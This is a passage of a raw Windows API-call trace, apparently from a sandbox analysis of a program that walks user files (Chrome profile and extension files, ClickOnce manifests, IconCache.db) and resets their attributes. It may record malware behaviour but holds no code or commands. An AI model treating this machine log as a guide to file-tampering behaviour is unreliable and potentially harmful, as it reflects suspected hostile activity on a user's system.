(cb=0x20c) returned 0x4e1c10 [0139.978] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.979] CoTaskMemFree (pv=0x4e1c10) [0139.979] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.979] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.979] CoTaskMemFree (pv=0x4e1c10) [0139.980] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.980] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.980] CoTaskMemFree (pv=0x4e1c10) [0139.981] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.981] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.981] CoTaskMemFree (pv=0x4e1c10) [0139.982] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.982] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.982] CoTaskMemFree (pv=0x4e1c10) [0139.983] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.983] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.983] CoTaskMemFree (pv=0x4e1c10) [0139.984] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.984] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.984] CoTaskMemFree (pv=0x4e1c10) [0139.986] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.986] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.986] CoTaskMemFree (pv=0x4e1c10) [0139.986] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.986] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.987] CoTaskMemFree (pv=0x4e1c10) [0139.987] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.987] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.987] CoTaskMemFree (pv=0x4e1c10) [0139.988] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.988] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.988] CoTaskMemFree (pv=0x4e1c10) [0139.989] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.989] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.989] CoTaskMemFree (pv=0x4e1c10) [0139.990] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.990] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.991] CoTaskMemFree (pv=0x4e1c10) [0139.991] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.991] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.991] CoTaskMemFree (pv=0x4e1c10) [0139.992] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0139.996] SetFileAttributesW (lpFileName="C:\\ProgramData\\Sun\\Java\\Java Update\\jaureglist.xml", dwFileAttributes=0x80) returned 1 [0140.017] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.017] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.017] CoTaskMemFree (pv=0x4e1c10) [0140.019] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.019] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.019] CoTaskMemFree (pv=0x4e1c10) [0140.020] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.020] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.020] CoTaskMemFree (pv=0x4e1c10) [0140.020] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.020] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.021] CoTaskMemFree (pv=0x4e1c10) [0140.022] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.022] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.022] CoTaskMemFree (pv=0x4e1c10) [0140.022] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.022] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.023] CoTaskMemFree (pv=0x4e1c10) [0140.023] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.023] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.024] CoTaskMemFree (pv=0x4e1c10) [0140.024] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.024] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.024] CoTaskMemFree (pv=0x4e1c10) [0140.025] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0140.128] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db", dwFileAttributes=0x80) returned 1 [0140.132] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.132] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.132] CoTaskMemFree (pv=0x4e1c10) [0140.133] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.133] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.133] CoTaskMemFree (pv=0x4e1c10) [0140.133] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.133] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.134] CoTaskMemFree (pv=0x4e1c10) [0140.136] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.136] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.137] CoTaskMemFree (pv=0x4e1c10) [0140.154] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.154] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.155] CoTaskMemFree (pv=0x4e1c10) [0140.155] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.155] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.155] CoTaskMemFree (pv=0x4e1c10) [0140.165] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.165] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.165] CoTaskMemFree (pv=0x4e1c10) [0140.166] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.166] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.166] CoTaskMemFree (pv=0x4e1c10) [0140.167] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.167] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.167] CoTaskMemFree (pv=0x4e1c10) [0140.167] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.167] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.168] CoTaskMemFree (pv=0x4e1c10) [0140.174] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.174] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.174] CoTaskMemFree (pv=0x4e1c10) [0140.175] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.175] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.175] CoTaskMemFree (pv=0x4e1c10) [0140.176] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.176] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.176] CoTaskMemFree (pv=0x4e1c10) [0140.178] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.178] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.178] CoTaskMemFree (pv=0x4e1c10) [0140.178] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.178] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.179] CoTaskMemFree (pv=0x4e1c10) [0140.179] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.179] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.179] CoTaskMemFree (pv=0x4e1c10) [0140.185] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.185] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.185] CoTaskMemFree (pv=0x4e1c10) [0140.193] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.193] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.193] CoTaskMemFree (pv=0x4e1c10) [0140.203] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0140.209] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest", dwFileAttributes=0x80) returned 1 [0140.211] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0140.217] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", dwFileAttributes=0x80) returned 1 [0140.219] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.219] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.220] CoTaskMemFree (pv=0x4e1c10) [0140.223] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0140.227] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\clic...exe_baa8013a79450f71_0001.0003_none_855491bb37a51715.manifest", dwFileAttributes=0x80) returned 1 [0140.231] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064 | out: lpFreeBytesAvailableToCaller=0x2af074, lpTotalNumberOfBytes=0x2af06c, lpTotalNumberOfFreeBytes=0x2af064) returned 1 [0140.243] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\manifests\\goog...app_baa8013a79450f71_0001.0003_none_677c9e37069a7e2a.manifest", dwFileAttributes=0x80) returned 1 [0140.245] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.246] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.246] CoTaskMemFree (pv=0x4e1c10) [0140.246] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.246] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.247] CoTaskMemFree (pv=0x4e1c10) [0140.247] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.247] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.248] CoTaskMemFree (pv=0x4e1c10) [0140.248] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.248] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.248] CoTaskMemFree (pv=0x4e1c10) [0140.253] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.253] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.253] CoTaskMemFree (pv=0x4e1c10) [0140.255] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.255] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.255] CoTaskMemFree (pv=0x4e1c10) [0140.256] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.256] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.257] CoTaskMemFree (pv=0x4e1c10) [0140.257] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.257] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.257] CoTaskMemFree (pv=0x4e1c10) [0140.262] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0140.269] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db", dwFileAttributes=0x80) returned 1 [0140.272] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac | out: lpFreeBytesAvailableToCaller=0x2af0bc, lpTotalNumberOfBytes=0x2af0b4, lpTotalNumberOfFreeBytes=0x2af0ac) returned 1 [0140.273] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.273] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.273] CoTaskMemFree (pv=0x4e1c10) [0140.274] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.274] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.274] CoTaskMemFree (pv=0x4e1c10) [0140.281] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.281] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.281] CoTaskMemFree (pv=0x4e1c10) [0140.294] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.294] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.294] CoTaskMemFree (pv=0x4e1c10) [0140.306] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.306] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.306] CoTaskMemFree (pv=0x4e1c10) [0140.316] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.316] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.317] CoTaskMemFree (pv=0x4e1c10) [0140.319] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.320] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.320] CoTaskMemFree (pv=0x4e1c10) [0140.337] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.343] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", dwFileAttributes=0x80) returned 1 [0140.345] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.350] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_16.png", dwFileAttributes=0x80) returned 1 [0140.355] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4 | out: lpFreeBytesAvailableToCaller=0x2aefe4, lpTotalNumberOfBytes=0x2aefdc, lpTotalNumberOfFreeBytes=0x2aefd4) returned 1 [0140.360] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html", dwFileAttributes=0x80) returned 1 [0140.364] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.364] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.364] CoTaskMemFree (pv=0x4e1c10) [0140.375] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.375] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.375] CoTaskMemFree (pv=0x4e1c10) [0140.376] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.376] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.376] CoTaskMemFree (pv=0x4e1c10) [0140.377] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.377] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.377] CoTaskMemFree (pv=0x4e1c10) [0140.386] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.386] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.387] CoTaskMemFree (pv=0x4e1c10) [0140.387] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.387] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.387] CoTaskMemFree (pv=0x4e1c10) [0140.388] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.390] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.390] CoTaskMemFree (pv=0x4e1c10) [0140.391] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.391] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.391] CoTaskMemFree (pv=0x4e1c10) [0140.396] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.396] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.396] CoTaskMemFree (pv=0x4e1c10) [0140.398] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.398] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.398] CoTaskMemFree (pv=0x4e1c10) [0140.399] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.399] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.400] CoTaskMemFree (pv=0x4e1c10) [0140.401] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.401] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.401] CoTaskMemFree (pv=0x4e1c10) [0140.401] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.401] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.401] CoTaskMemFree (pv=0x4e1c10) [0140.402] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.402] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.403] CoTaskMemFree (pv=0x4e1c10) [0140.403] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.403] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.404] CoTaskMemFree (pv=0x4e1c10) [0140.406] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.406] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.406] CoTaskMemFree (pv=0x4e1c10) [0140.407] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.407] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.407] CoTaskMemFree (pv=0x4e1c10) [0140.408] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.408] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.408] CoTaskMemFree (pv=0x4e1c10) [0140.409] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.409] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.409] CoTaskMemFree (pv=0x4e1c10) [0140.410] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.410] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.410] CoTaskMemFree (pv=0x4e1c10) [0140.410] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.410] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.411] CoTaskMemFree (pv=0x4e1c10) [0140.412] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.412] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.412] CoTaskMemFree (pv=0x4e1c10) [0140.412] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.412] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.413] CoTaskMemFree (pv=0x4e1c10) [0140.414] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.414] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.414] CoTaskMemFree (pv=0x4e1c10) [0140.414] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.414] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.414] CoTaskMemFree (pv=0x4e1c10) [0140.416] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.416] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.416] CoTaskMemFree (pv=0x4e1c10) [0140.416] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.416] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.417] CoTaskMemFree (pv=0x4e1c10) [0140.418] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.418] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.418] CoTaskMemFree (pv=0x4e1c10) [0140.418] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.418] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.419] CoTaskMemFree (pv=0x4e1c10) [0140.420] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0140.420] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: 